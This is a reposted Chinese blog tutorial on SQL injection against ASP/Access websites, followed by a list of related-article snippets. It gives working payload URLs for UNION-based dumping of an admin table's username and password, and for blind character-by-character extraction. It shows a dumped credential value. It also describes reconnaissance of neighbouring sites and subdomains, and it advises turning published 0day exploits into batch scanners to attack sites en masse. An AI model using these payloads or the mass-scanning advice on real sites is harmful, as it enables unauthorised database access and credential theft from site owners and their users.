Sql注入基础_access注入

最新推荐文章于 2025-09-12 14:04:02 发布
转载 最新推荐文章于 2025-09-12 14:04:02 发布 · 88 阅读 · 0 ·
CC 4.0 BY-SA版权
原文链接:http://www.cnblogs.com/cui0x01/p/8620411.html
文章标签:

#运维

本文详细介绍Access数据库中的SQL注入攻击手段,包括联合查询法、逐字猜解法及偏移注入等技术细节。通过实例演示如何利用这些方法进行表名、列名及数据的猜解。

1.access注入攻击片段-联合查询

2.access注入攻击片段-逐字猜解法

3.Access偏移注入(表名和列名猜解成功率不是百分百,猜解不到

 

access注入攻击片段-联合查询法

 

判断注入

猜解表名

猜解列名

猜解数据

Order by 22 22 代表查询的列名的数目有22

http://www.test.com/Production/PRODUCT_DETAIL.asp?id=1513 order by 22 正常

http://www.test.com/Production/PRODUCT_DETAIL.asp?id=1513 order by 23 错误



猜解表名 确定存在admin表名

http://www.test.com/Production/PRODUCT_DETAIL.asp?id=1513 UNION SELECT

1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from admin

爆出3,5

 

 

名称:3
介绍:15

 


猜解列名 猜解数据(在3和15位置上填入可能存在的列名)

http://www.test.com/Production/PRODUCT_DETAIL.asp?id=1513 UNION SELECT

1,2,password,4,5,6,7,8,9,10,11,12,13,14,admin,16,17,18,19,20,21,22 from admin

 

爆出帐号密码

 

 

名称:a48e190fafc257d3
介绍:admin

 

 

2.access注入攻击片段-逐字猜解法

查表:and exists (select * from 表名)

查列:and exists (select 列名from 表名)

查数据:1.确定长度 2.确定asc数据(asc编码)

and (select top 1 len(列名) from admin)=5

and (select top 1 asc(mid(列名,位数,1)) from admin)=97

and (select top 1 asc(mid(列名,位数,1)) from admin)=97



Admin

Adminpassword

Admin列名长度为5

Password 列名长度为16

 

3.access偏移注入是解决一些注入出不来列名或者时的情况,同时要求支持union select ,列名也必须足够多,知道表名

 https://www.cnblogs.com/habi/articles/7837565.html

 

 

旁注查询,子域名查询


旁注查询:同服务器下不同的站点,寻找查询接口

http://dns.aizhan.com/www.whxy.net/


子域名查询:

分为二级或三级域名,可能存在同服务器或同网段

搜索引擎查询,暴力猜解(layersubDomainsBrute等)

 

www.0day5.com,可以上这个网站看看最新的oday ,改写里面的exp改成批量扫描的,批量扫站

 

 

 

 

 

转载于:https://www.cnblogs.com/cui0x01/p/8620411.html

WEB攻防-通用漏洞-SQL注入-ACCESS一般注入与偏移注入
weixin_45534587的博客
07-11 1160
同样的使用union select来做,不同的是不需要知道列名,而是通过偏移爆出数据,但前提是查询的必须比当前查询到的列数小,如该案例在上文中查询到22列,则如果要查询admin的列数必须比当前查询的22列的列数少,因为要把查询到塞进当前查询到列中,不理往下看例子。union select 1,2,3,4,5,6,7,8,9,10,11,admin.* from admin --回显错误。在偏移6位之后回显正常,则知道admin有6列 ,而3和15是回显位,这里选择使用15回显。
sql注入
热门推荐
渗透之路,攻防之间皆学问
05-05 25万+
SQL注入SQL Injection)是一种常见的Web安全漏洞,主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句中后,被当作SQL语句的一部分执行。 从而导致数据库受损(被脱库、被删除、甚至整个服务器权限陷)。 即:注入产生的原因是后台服务器接收相关参数未经过滤直接带入数据库查询...
SQL注入--Access注入
qq_37107430的博客
12-11 1066
Access数据库跟mysql、mssql、Oracle等数据库不一样,它就是一个独立的数据库,并不像mysql这些数据库有自带的数据库(mysql中的information\_schema),所以我们在进行注入的时候需要用到不一样的方法。
1.4_SQL注入
m0_73983897的博客
10-23 1652
本文的主要内容:SQL手工注入的原理,条件和流程,涉及Union联合注入 + 报错注入 + 布尔盲注 + 时间盲注 + 宽字节注入 + 堆叠注入 + 外带注入 + 二次注入
mysql sql注入工具_SQL注入工具实践
weixin_42353061的博客
02-07 1112
程序简介超级SQL注入工具(SSQLInjection)是一款基于HTTP协议自组包的SQL注入工具,支持出现在HTTP协议任意位置的SQL注入,支持各种类型的SQL注入,支持HTTPS模式注入。超级SQL注入工具目前支持Bool型盲注、错误显示注入、Union注入,支持Access、MySQL5以上版本、SQLServer、Oracle等数据库。超级SQL注入工具采用C#开发,底层采用Socke...
sql注入基础原理(超详细)
会哭的雨@的博客
05-17 13万+
一、Sql注入简介 Sql 注入攻击是通过将恶意的 Sql 查询添加语句插入到应用的输入参数中,再在后台 Sql 服务器上析执行进行的攻击,它目前黑客对数据库进行攻击的最常用手段之一。 二、Web 程序三层架构 三层架构(3-tier architecture) 通常意义上就是将整个业务应用划分为: 界面层(User Interface layer) 业务逻辑层(Busi...
SQL注入(Access、Mssql)
jxy158212的博客
01-03 1779
之前的文章,已经详细介绍了sql注入的原理,和常见sql注入方式,并以MySql数据库进行了简单的示例。接下来,我们将以Access和Mssql数据库为例进行讲
SQL注入ACCESS注入
2201_75572825的博客
08-03 859
利用1 and 1=1和1 and 1=2来判断,者加减号,单引号,能引起页面报错则可能存在漏洞。
sql注入-asp+access案例
qq_53706360的博客
12-04 215
id=1142 order by 22返回结果正常。id=1142 order by 23返回结果失败。爆破出密码: a48e190fafc257d3。爆出了admin字段的第一个值:admin。实战中和列要靠字典去
ASP_ACCESS_SQL_Injection_Test.rar_asp access注入_linux_sql注入_注入_注入
09-19
ASP_ACCESS_SQL_Injection_Test 是一个针对ASP访问Access数据库时可能出现SQL注入漏洞的测试工具。SQL注入是一种常见的网络安全问题,攻击者通过在输入字段中插入恶意SQL代码,试图获取未经授权的数据者控制数据库...
ASP_ACCESS_SQL_Injection_Test.rar_sql注入_tool
09-20
ASP_ACCESS_SQL_Injection_Test 是一个专门针对ASP(Active Server Pages)和ACCESS数据库的SQL注入测试工具。这个压缩包包含了两个文本文件和一个可执行程序,用于帮助开发者安全研究人员检测和预防SQL注入漏洞。...
zhuru.rar_SQL inject_asp注入_sql 注入_sql注入_zhuru sql
09-14
描述中的"sql注入测试程序,asp+access注入测试小程序"明该程序主要针对ASP页面与Access数据库的交互进行测试。 `sql.asp`:这可能是一个包含SQL查询的ASP脚本文件,用于演示如何处理用户输入并将其传递到数据库。...
SQL.rar_ACCESS数据库_C 数据库_CSharp 数据库_access
09-19
这可能涉及使用参数化查询来防止SQL注入,使用事务处理来确保数据一致性,者利用数据适配器和数据集进行离线数据操作。 5. **CSharp_数据库**: 这个标签明了C#在数据库编程方面的应用。C#可以与其他类型的...
sql注入靶场_sql注入
weixin_26705651的博客
09-21 1056
sql注入靶场My first experience with SQL injection was some 20 years ago but is still very relevant today. 我第一次使用SQL注入的经验大约是20年前,但是今天仍然非常重要。 With all the advanced Database access frameworks, features, and...
ASP_ACCESS_SQL_Injection_Test工具:SQL注入攻击与防御
资源摘要信息:"ASP_ACCESS_SQL_Injection_Test.rar是一个SQL注入测试工具的压缩包文件,它包含至少两个文件,一个是ASP_ACCESS_SQL_Injection_Test.pl,另一个是www.pudn.com.txt。这个工具通常用于网络安全领域,...
quartz 持久化集成springBoot Demo
杨杨杨~~的博客
09-09 1724
本文介绍了Quartz持久化与SpringBoot集成的优势及MySQL初始化方法。Quartz持久化可实现任务零丢失、集群高可用、动态运维、与Spring生态无缝整合等企业级需求,支持幂等、事务、审计等功能。MySQL初始化部分详细说明了11个核心的作用及关系,包括任务定义(QRTZ_JOB_DETAILS)、触发器(QRTZ_TRIGGERS)等,并提供了完整的建SQL脚本。该方案能确保任务调度在应用重启、集群部署等场景下的可靠性,是构建健壮定时任务系统的理想选择。
《Linux运维总结:Redis7.4.5哨兵集群开启ACL并配置用户》
最新发布
东城绝神
09-12 548
《Linux运维总结:Redis7.4.5哨兵集群开启ACL并配置用户》
LVS负载均衡群集与Keepalived高可用
m0_46460826的博客
09-11 722
在当今的互联网时代,随着业务的快速发展,用户访问量呈现爆炸式增长。为了应对这种高并发的访问需求,确保网站应用的稳定性、可靠性和高性能,负载均衡技术应运而生。负载均衡(Load Balancing)是一种将网络流量计算任务分配到多个服务器上的技术,旨在优化资源利用、最大化吞吐量、最小化响应时间,并避免任何单一资源的过载。在众多负载均衡决方案中,LVS(Linux Virtual Server)和Keepalived凭借其高性能、高可用性和灵活性,成为了企业级应用中的热门选择。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值